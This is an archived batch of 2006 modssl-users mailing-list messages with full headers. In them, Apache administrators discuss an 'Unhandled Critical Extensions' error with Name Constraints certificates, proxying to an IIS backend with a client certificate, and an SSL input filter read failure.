        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=r0A9ud0eTTxoAx4VdKxMVx1ubQueszcfYJaTH+GFs1ACIrNlWpPkw4heN6vtOLJvBfqO+obRSZ38iJk3gh5lfCEJDZ0efx7IPaSFa2+UYq6sslKQOhLGaEkrd6ULy8tlhIKzwA5O2JEKNApzxliymZpt7ZgPiV2qXcVVr1nOGE8=
Received: by 10.65.51.13 with SMTP id d13mr887320qbk;
        Wed, 07 Jun 2006 11:50:25 -0700 (PDT)
Received: by 10.64.153.8 with HTTP; Wed, 7 Jun 2006 11:50:25 -0700 (PDT)
Message-ID: <4df88430606071150k739f4ef6i7a3c5ec6e70afc7a@mail.gmail.com>
Date: Wed, 7 Jun 2006 19:50:25 +0100
From: "Diarmuid Curtin" 
To: modssl-users@modssl.org
Subject: Unhandled Critical Extensions
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_8404_31519867.1149706225690"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Diarmuid Curtin" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_8404_31519867.1149706225690
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi,

How does MOD_SSL call OpenSSL for the purpose of Certificate Verification? I
have a certificate which has the critical extension 'Name Constraints', when
I parse the cert with OpenSSL 0.9.8(b) it seems OpenSSL understands the
Certificate, however, when I present the cert to Apache, it fails with the
Error Message 'Unhandled Critical Extensions'

THis leads me to believe MOD_SSL calls OpenSSL in a different manner. Has
anyone any experience of this?


Diarmuid

------=_Part_8404_31519867.1149706225690
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


Hi,


How does MOD_SSL call OpenSSL for the purpose of Certificate Verification? I have a certificate which has the critical extension 'Name Constraints', when I parse the cert with OpenSSL 0.9.8(b) it seems OpenSSL understands the Certificate, however, when I present the cert to Apache, it fails with the Error Message 'Unhandled Critical Extensions'



THis leads me to believe MOD_SSL calls OpenSSL in a different manner. Has anyone any experience of this?



Diarmuid


------=_Part_8404_31519867.1149706225690--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  7 21:29:02 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E441C14D88C; Wed,  7 Jun 2006 21:29:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mars.net-itech.com (static-64-201-187-87.ptr.terago.ca [64.201.187.87])
	by master.modssl.org (Postfix) with SMTP id C64A414D864
	for ; Wed,  7 Jun 2006 21:28:59 +0200 (CEST)
Received: (qmail 17668 invoked from network); 7 Jun 2006 19:28:55 -0000
Received: from unknown (HELO ?192.168.12.221?) (192.168.12.221)
  by mars.net-itech.com with SMTP; 7 Jun 2006 19:28:55 -0000
From: Patrick Patterson 
Organization: Carillon Information Security Inc.
To: modssl-users@modssl.org
Subject: Re: Unhandled Critical Extensions
Date: Wed, 7 Jun 2006 15:28:32 -0400
User-Agent: KMail/1.9.1
References: <4df88430606071150k739f4ef6i7a3c5ec6e70afc7a@mail.gmail.com>
In-Reply-To: <4df88430606071150k739f4ef6i7a3c5ec6e70afc7a@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="utf-8"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200606071528.33324.ppatterson@carillonis.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Patrick Patterson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Diarmuid:

On Wednesday 07 June 2006 14:50, Diarmuid Curtin wrote:
> Hi,
>
> How does MOD_SSL call OpenSSL for the purpose of Certificate Verification?
> I have a certificate which has the critical extension 'Name Constraints',
> when I parse the cert with OpenSSL 0.9.8(b) it seems OpenSSL understands
> the Certificate, however, when I present the cert to Apache, it fails with
> the Error Message 'Unhandled Critical Extensions'
>
> THis leads me to believe MOD_SSL calls OpenSSL in a different manner. Has
> anyone any experience of this?
>
This looks like correct behaviour - since mod_ssl doesn't handle the name 
constraints extension, but RFC3280 says that any extension marked critical 
needs to be handled by the application, it is operating within the 
specification of the RFC.

The fact that OpenSSL parses it correctly is somewhat irrelevant - mod_ssl 
also probably does the parsing just fine, but then follows the RFC defined 
behaviour for critical extension handling.

What probably needs to happen, is that someone needs to implement correct 
handling for Name Constraints (and probably AIA and SIA, since Name 
constraints really only come into play with you are doing Path Validation).

-- 
Patrick Patterson
Chief PKI Architect
Carillon Information Security Inc.
http://www.carillon.ca
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun  7 21:56:40 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A5EAD14D88C; Wed,  7 Jun 2006 21:56:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0102.google.com (nz-out-0102.google.com [64.233.162.202])
	by master.modssl.org (Postfix) with ESMTP id 04A3E14D864
	for ; Wed,  7 Jun 2006 21:56:39 +0200 (CEST)
Received: by nz-out-0102.google.com with SMTP id 12so224353nzp
        for ; Wed, 07 Jun 2006 12:56:35 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=auDiUzyuA/wlrUzqMxULkKWMDnEMRv7uimPDzr+O/kV7E8LFz7plFaLxC+Tz7y5ThDO+vk3b0ju0aj+VCm6nijcYxkadPDZ31qgWJkry7wpyWhshJBFTgWjEAOlsSnkzHS/s7FD4JvxJrC2rlYr8T+bwhrGx8fSwgEll7SLpKig=
Received: by 10.64.10.5 with SMTP id 5mr974746qbj;
        Wed, 07 Jun 2006 12:56:35 -0700 (PDT)
Received: by 10.64.153.8 with HTTP; Wed, 7 Jun 2006 12:56:35 -0700 (PDT)
Message-ID: <4df88430606071256s1ef25a72x3e245fc4ec12dfd6@mail.gmail.com>
Date: Wed, 7 Jun 2006 20:56:35 +0100
From: "Diarmuid Curtin" 
To: modssl-users@modssl.org
Subject: Re: Unhandled Critical Extensions
In-Reply-To: <200606071528.33324.ppatterson@carillonis.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_9584_974819.1149710195458"
References: <4df88430606071150k739f4ef6i7a3c5ec6e70afc7a@mail.gmail.com>
	 <200606071528.33324.ppatterson@carillonis.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Diarmuid Curtin" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_9584_974819.1149710195458
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi Patrick -

I agree, it acting in accordance to the RFC - any critical extensions it
does not understand, it rejects.

Seems to me that name constraint handling marked as critical would be nice
to have...

DC

On 6/7/06, Patrick Patterson  wrote:

> Hi Diarmuid:
>
> On Wednesday 07 June 2006 14:50, Diarmuid Curtin wrote:
> > Hi,
> >
> > How does MOD_SSL call OpenSSL for the purpose of Certificate
> Verification?
> > I have a certificate which has the critical extension 'Name
> Constraints',
> > when I parse the cert with OpenSSL 0.9.8(b) it seems OpenSSL understands
> > the Certificate, however, when I present the cert to Apache, it fails
> with
> > the Error Message 'Unhandled Critical Extensions'
> >
> > THis leads me to believe MOD_SSL calls OpenSSL in a different manner.
> Has
> > anyone any experience of this?
> >
> This looks like correct behaviour - since mod_ssl doesn't handle the name
> constraints extension, but RFC3280 says that any extension marked critical
> needs to be handled by the application, it is operating within the
> specification of the RFC.
>
> The fact that OpenSSL parses it correctly is somewhat irrelevant - mod_ssl
> also probably does the parsing just fine, but then follows the RFC defined
> behaviour for critical extension handling.
>
> What probably needs to happen, is that someone needs to implement correct
> handling for Name Constraints (and probably AIA and SIA, since Name
> constraints really only come into play with you are doing Path
> Validation).
>
> --
> Patrick Patterson
> Chief PKI Architect
> Carillon Information Security Inc.
> http://www.carillon.ca
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

------=_Part_9584_974819.1149710195458
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


Hi Patrick -


 


I agree, it acting in accordance to the RFC - any critical extensions it does not understand, it rejects. 


 


Seems to me that name constraint handling marked as critical would be nice to have... 


 


DC


 


On 6/7/06, Patrick Patterson <ppatterson@carillonis.com> wrote:




Hi Diarmuid:

On Wednesday 07 June 2006 14:50, Diarmuid Curtin wrote:
> Hi,
>
> How does MOD_SSL call OpenSSL for the purpose of Certificate Verification?

> I have a certificate which has the critical extension 'Name Constraints',
> when I parse the cert with OpenSSL 0.9.8(b) it seems OpenSSL understands
> the Certificate, however, when I present the cert to Apache, it fails with

> the Error Message 'Unhandled Critical Extensions'
>
> THis leads me to believe MOD_SSL calls OpenSSL in a different manner. Has
> anyone any experience of this?
>
This looks like correct behaviour - since mod_ssl doesn't handle the name

constraints extension, but RFC3280 says that any extension marked critical
needs to be handled by the application, it is operating within the
specification of the RFC.

The fact that OpenSSL parses it correctly is somewhat irrelevant - mod_ssl

also probably does the parsing just fine, but then follows the RFC defined
behaviour for critical extension handling.

What probably needs to happen, is that someone needs to implement correct
handling for Name Constraints (and probably AIA and SIA, since Name

constraints really only come into play with you are doing Path Validation).

--
Patrick Patterson
Chief PKI Architect
Carillon Information Security Inc.
http://www.carillon.ca

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      
modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



------=_Part_9584_974819.1149710195458--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  8 04:39:38 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B6E3314D874; Thu,  8 Jun 2006 04:39:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0102.google.com (nz-out-0102.google.com [64.233.162.201])
	by master.modssl.org (Postfix) with ESMTP id 3BDAA14D82C
	for ; Thu,  8 Jun 2006 04:39:37 +0200 (CEST)
Received: by nz-out-0102.google.com with SMTP id 12so289907nzp
        for ; Wed, 07 Jun 2006 19:39:33 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=KW08q42OQt0F8ms+yHNX2HbPS/7//HJWWkk835YoWE12mBkdvWD4icjW0z/iUXk9XytiY7o3TVNYv65mluQ7iBvPESoBtIw2DVUANL3kyhs3UKLEZeQQO7XMdty5JnqfyxR8j2lEL0XxggajZzZ1SYb5qY/9QX9qCkpzPhGyFVY=
Received: by 10.36.121.1 with SMTP id t1mr1634147nzc;
        Wed, 07 Jun 2006 19:39:33 -0700 (PDT)
Received: by 10.36.221.51 with HTTP; Wed, 7 Jun 2006 19:39:33 -0700 (PDT)
Message-ID: 
Date: Wed, 7 Jun 2006 22:39:33 -0400
From: "BJ Swope" 
To: modssl-users@modssl.org
Subject: Re: Mod_proxy and client certificate auth
In-Reply-To: 
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_6490_26291812.1149734373426"
References: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BJ Swope" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_6490_26291812.1149734373426
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

>From everything I've heard and read, mod-proxy will not proxy HTTPS on the
back like what you are asking.  You can have HTTPS on the front end but not
on the back.  It will have to be HTTP to the back.

If you get this working I would LOVE to hear how you got it done!!!!



On 6/6/06, Paul D. Robertson  wrote:
>
>
> Hi,
>
> I'm trying to get mod_proxy to work as an SSL proxy using a client
> certificate on the proxy to connect to a backend IIS server that's set up
> to use any client certificate signed by my OpenSSL-based CA.
>
> If I use a browser with the same certificate bundled up as a PKCS12
> bundle, through the proxy, it all works, but what I really need is for
> Apache/mod_ssl to use a locally stored version of the cert/key to connect,
> then let the IIS server do its normal basic auth.  That's one single
> client cert/key for all externally connecting users (yes, I understand
> the ramifaction- it's not for user authentication,) not a per-user proxy
> cert.
>
> Here's what I have in my Apache ssl.conf file:
>
> RequestHeader set Front-End-Https "On"
> CacheDisable *
> SSLProxyEngine On
> ProxyPass /app https://iisserver/app
> ProxyPassReverse /app https://iisserver/app
> SSLProxyMachineCertificatePath conf/cert
> SSLEngine on
>
> conf/cert contains user.pem, a .pem cert file with an RSA private key
> catenated to it.  I also have a hash link to the user.pem cert file.
>
> Just in case, I've also added "export OPENSSL_ALLOW_PROXY_CERTS=1" to
> bin/envvars.
>
> Can anyone tell me what I'm doing wrong?
>
> Thanks,
>
> Paul
>
> -----------------------------------------------------------------------------
> Paul D. Robertson      "My statements in this message are personal
> opinions
> paul@compuwar.net       which may have no basis whatsoever in fact."
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>



-- 
We are all slave to our own paradigm. -- Joshua Williams

------=_Part_6490_26291812.1149734373426
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

>From everything I've heard and read, mod-proxy will not proxy HTTPS on
the back like what you are asking.  You can have HTTPS on the
front end but not on the back.  It will have to be HTTP to the
back.



If you get this working I would LOVE to hear how you got it done!!!!





On 6/6/06, Paul D. Robertson <paul@compuwar.net> wrote:


Hi,

I'm trying to get mod_proxy to work as an SSL proxy using a client
certificate on the proxy to connect to a backend IIS server that's set up
to use any client certificate signed by my OpenSSL-based CA.


If I use a browser with the same certificate bundled up as a PKCS12
bundle, through the proxy, it all works, but what I really need is for
Apache/mod_ssl to use a locally stored version of the cert/key to connect,

then let the IIS server do its normal basic auth.  That's one single
client cert/key for all externally connecting users (yes, I understand
the ramifaction- it's not for user authentication,) not a per-user proxy

cert.

Here's what I have in my Apache ssl.conf file:

RequestHeader set Front-End-Https "On"
CacheDisable *
SSLProxyEngine On
ProxyPass /app https://iisserver/app

ProxyPassReverse /app https://iisserver/app
SSLProxyMachineCertificatePath conf/cert
SSLEngine on

conf/cert contains user.pem, a .pem cert file with an RSA private key

catenated to it.  I also have a hash link to the user.pem cert file.

Just in case, I've also added "export OPENSSL_ALLOW_PROXY_CERTS=1" to
bin/envvars.

Can anyone tell me what I'm doing wrong?


Thanks,

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions

paul@compuwar.net       which may have no basis whatsoever in fact."

______________________________________________________________________
Apache
Interface to OpenSSL
(mod_ssl)                  
www.modssl.org
User Support Mailing
List                      modssl-users@modssl.org
Automated
List
Manager                            majordomo@modssl.org



-- 
We are all slave to our own paradigm. -- Joshua Williams

------=_Part_6490_26291812.1149734373426--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun  8 15:40:08 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C2B1F14D88E; Thu,  8 Jun 2006 15:40:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from compuwar.net (compuwar.net [209.50.252.247])
	by master.modssl.org (Postfix) with ESMTP id 7283414D82C
	for ; Thu,  8 Jun 2006 15:40:07 +0200 (CEST)
Received: by compuwar.net (Postfix, from userid 500)
	id C634A6A416B; Thu,  8 Jun 2006 09:37:11 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1])
	by compuwar.net (Postfix) with ESMTP id C40A638C002
	for ; Thu,  8 Jun 2006 09:37:11 -0400 (EDT)
Date: Thu, 8 Jun 2006 09:37:11 -0400 (EDT)
From: "Paul D. Robertson" 
X-X-Sender: paul@bat.clueby4.org
To: modssl-users@modssl.org
Subject: Re: Mod_proxy and client certificate auth
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Paul D. Robertson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 7 Jun 2006, BJ Swope wrote:

> >From everything I've heard and read, mod-proxy will not proxy HTTPS on the
> back like what you are asking.  You can have HTTPS on the front end but not
> on the back.  It will have to be HTTP to the back.
> 
> If you get this working I would LOVE to hear how you got it done!!!!
> 
> 

I'm getting end-to-end SSL, just the undesired (this time) effect of 
having the client cert passed all the way through the chain, which I'd 
expect folks to want as normal behavior.

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
paul@compuwar.net       which may have no basis whatsoever in fact."
http://fora.compuwar.net      Infosec discussion boards 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  9 01:27:03 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8FC9914D899; Fri,  9 Jun 2006 01:27:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0102.google.com (nz-out-0102.google.com [64.233.162.205])
	by master.modssl.org (Postfix) with ESMTP id 1899514D83D
	for ; Fri,  9 Jun 2006 01:27:02 +0200 (CEST)
Received: by nz-out-0102.google.com with SMTP id m22so557615nzf
        for ; Thu, 08 Jun 2006 16:26:58 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
        b=Brlux4jgMQkpv8Nxou6PmC4Oh6zVEkFzqhcaB2DbI6u/76j3GIg+GnBltxpVSc1WRpeMFxrVjjqMred4aBhzMgGBFkQPNK2r0lAhK+QGFPhlFTtxpOUn+eKh+IBT7vc3t4pGlA2MyA3XWfo35ubXkNV7JVoVASe8BW6sRPDht7s=
Received: by 10.37.13.40 with SMTP id q40mr3086792nzi;
        Thu, 08 Jun 2006 16:26:58 -0700 (PDT)
Received: by 10.36.221.51 with HTTP; Thu, 8 Jun 2006 16:26:58 -0700 (PDT)
Message-ID: 
Date: Thu, 8 Jun 2006 19:26:58 -0400
From: "BJ Swope" 
To: modssl-users@modssl.org
Subject: Re: Mod_proxy and client certificate auth
In-Reply-To: 
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_4928_1303467.1149809218370"
References: 
	 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "BJ Swope" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_4928_1303467.1149809218370
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Guess I've been hearing wrong for 3 years now ;)

Time to go digging...

On 6/8/06, Paul D. Robertson  wrote:
>
> On Wed, 7 Jun 2006, BJ Swope wrote:
>
> > >From everything I've heard and read, mod-proxy will not proxy HTTPS on
> the
> > back like what you are asking.  You can have HTTPS on the front end but
> not
> > on the back.  It will have to be HTTP to the back.
> >
> > If you get this working I would LOVE to hear how you got it done!!!!
> >
> >
>
> I'm getting end-to-end SSL, just the undesired (this time) effect of
> having the client cert passed all the way through the chain, which I'd
> expect folks to want as normal behavior.
>
> Paul
>
> -----------------------------------------------------------------------------
> Paul D. Robertson      "My statements in this message are personal
> opinions
> paul@compuwar.net       which may have no basis whatsoever in fact."
> http://fora.compuwar.net      Infosec discussion boards
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>



-- 
We are all slave to our own paradigm. -- Joshua Williams

------=_Part_4928_1303467.1149809218370
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Guess I've been hearing wrong for 3 years now ;)



Time to go digging...

On 6/8/06, Paul D. Robertson <paul@compuwar.net> wrote:

On Wed, 7 Jun 2006, BJ Swope wrote:

> >From everything I've heard and read, mod-proxy will not proxy HTTPS on the
> back like what you are asking.  You can have HTTPS on the front end but not
> on the back.  It will have to be HTTP to the back.

>
> If you get this working I would LOVE to hear how you got it done!!!!
>
>

I'm getting end-to-end SSL, just the undesired (this time) effect of
having the client cert passed all the way through the chain, which I'd

expect folks to want as normal behavior.

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions

paul@compuwar.net       which may have no basis whatsoever in fact."
http://fora.compuwar.net      Infosec discussion boards


______________________________________________________________________
Apache
Interface to OpenSSL
(mod_ssl)                  
www.modssl.org
User Support Mailing
List                      modssl-users@modssl.org
Automated
List
Manager                            majordomo@modssl.org



-- 
We are all slave to our own paradigm. -- Joshua Williams

------=_Part_4928_1303467.1149809218370--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  9 12:17:02 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3EFBC14D89A; Fri,  9 Jun 2006 12:17:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 0193814D83D
	for ; Fri,  9 Jun 2006 12:16:58 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11.20060308/8.12.11) with ESMTP id k59AGqtd016611;
	Fri, 9 Jun 2006 06:16:52 -0400
Received: from turnip.cambridge.redhat.com (turnip.cambridge.redhat.com [172.16.18.137])
	by int-mx1.corp.redhat.com (8.12.11.20060308/8.12.11) with ESMTP id k59AGoUg028119;
	Fri, 9 Jun 2006 06:16:51 -0400
Received: from turnip.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by turnip.cambridge.redhat.com (8.13.6/8.13.5) with ESMTP id k59AGkVf002023;
	Fri, 9 Jun 2006 11:16:46 +0100
Received: (from jorton@localhost)
	by turnip.cambridge.redhat.com (8.13.6/8.13.6/Submit) id k59AGilc002022;
	Fri, 9 Jun 2006 11:16:44 +0100
X-Authentication-Warning: turnip.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Fri, 9 Jun 2006 11:16:44 +0100
From: Joe Orton 
To: "Paul D. Robertson" 
Cc: modssl-users@modssl.org
Subject: Re: Mod_proxy and client certificate auth
Message-ID: <20060609101644.GA1522@redhat.com>
Mail-Followup-To: "Paul D. Robertson" ,
	modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.2.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Jun 06, 2006 at 03:36:37PM -0400, Paul D. Robertson wrote:
> I'm trying to get mod_proxy to work as an SSL proxy using a client 
> certificate on the proxy to connect to a backend IIS server that's set up 
> to use any client certificate signed by my OpenSSL-based CA.  
> 
> If I use a browser with the same certificate bundled up as a PKCS12 
> bundle, through the proxy, it all works, but what I really need is for 
> Apache/mod_ssl to use a locally stored version of the cert/key to connect, 
> then let the IIS server do its normal basic auth.  That's one single 
> client cert/key for all externally connecting users (yes, I understand 
> the ramifaction- it's not for user authentication,) not a per-user proxy 
> cert.

There's no way to do this with mod_ssl without modifying the source. 
With httpd 2.2.x (and also I believe mod_ssl-2.8-for-1.3) what you can 
do is to pass through the client's SSL certificate (in PEM format) as a 
request header to the backend, then extract that on the backend server 
and then verify that against a CA cert independently; see 
http://httpd.apache.org/docs/2.2/mod/mod_headers.html#header and the 
%{...}s stuff.  

That is the traditional approach used when passing through client certs 
to Tomcat etc, and doesn't require an SSL connection between proxy and 
backend.  Doing this with an IIS backend might be a challenge.

> Just in case, I've also added "export OPENSSL_ALLOW_PROXY_CERTS=1" to 
> bin/envvars.

That affects handling of rfc3820 "proxy certificates" (which you not 
using unless you are doing some serious PKI voodoo ;).

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 13 05:58:31 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A23DC14D880; Tue, 13 Jun 2006 05:58:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from motgate2.mot.com (motgate2.mot.com [144.189.100.101])
	by master.modssl.org (Postfix) with ESMTP id 9529514D83B
	for ; Tue, 13 Jun 2006 05:58:19 +0200 (CEST)
Received: from az33exr03.mot.com (az33exr03.mot.com [10.64.251.233])
	by motgate2.mot.com (8.12.11/Motgate2) with ESMTP id k5D3wCR1029722
	for ; Mon, 12 Jun 2006 20:58:12 -0700 (MST)
Received: from tx14exm60.ds.mot.com (tx14exm60.ds.mot.com [10.63.147.60])
	by az33exr03.mot.com (8.13.1/8.13.0) with ESMTP id k5D3wBg4010896
	for ; Mon, 12 Jun 2006 22:58:11 -0500 (CDT)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C68E9D.965949B9"
Subject: SSL input filter read failed error
Date: Mon, 12 Jun 2006 22:58:10 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL input filter read failed error
thread-index: AcaOnZXMSFd/siuLT029/rU8KcQWzg==
From: "KRISHNAMURTHY SUDHAKAR-FSK031" 
To: , 
X-Brightmail-Tracker: AAAAAQAAAAQ=
X-White-List-Member: TRUE
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "KRISHNAMURTHY SUDHAKAR-FSK031" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C68E9D.965949B9
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hello
=20
I've setup SSL on my apache web server with client authentication and
the first request from the client seems to be successful or at least
partially, before I send a second request I get a " SSL input filter
read failed error" that I see on my server logs while the client is also
complaining about read failed error.
=20
Here's the message from my access.log(1) and error.log(2)
<1> 109.4.71.56 - - [12/Jun/2006:22:03:23 -0500] "POST
/Myserver/servlet/mySevrlet?name=3Dmyname HTTP/1.1" 200 -
<2> [Mon Jun 12 22:03:54 2006] [info] (OS 10060)A connection attempt
failed because the connected party did not properly respond after a
period of time, or established connection failed because connected host
has failed to respond.  : SSL input filter read failed.
<2> [Mon Jun 12 22:03:54 2006] [info] Connection to child 249 closed
with standard shutdown(server myserver.com:4430, client 109.4.71.56)
=20
Any help is appreciated.
TIA


------_=_NextPart_001_01C68E9D.965949B9
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable







Hello


 


I've =
setup SSL on my=20
apache web server with client authentication and the first request from =
the=20
client seems to be successful or at least partially, before I send a =
second=20
request I get a " SSL input filter read failed error" that I see on my =
server=20
logs while the client is also complaining about read failed=20
error.


 


Here's =
the message=20
from my access.log(1) and error.log(2)


<1>=20
109.4.71.56 - - [12/Jun/2006:22:03:23 -0500] "POST=20
/Myserver/servlet/mySevrlet?name=3Dmyname HTTP/1.1" 200 -
<2> =
[Mon Jun 12=20
22:03:54 2006] [info] (OS 10060)A connection attempt failed because the=20
connected party did not properly respond after a period of time, or =
established=20
connection failed because connected host has failed to respond.  : =
SSL=20
input filter read failed.
<2> [Mon Jun 12 22:03:54 2006] [info] =

Connection to child 249 closed with standard shutdown(server =
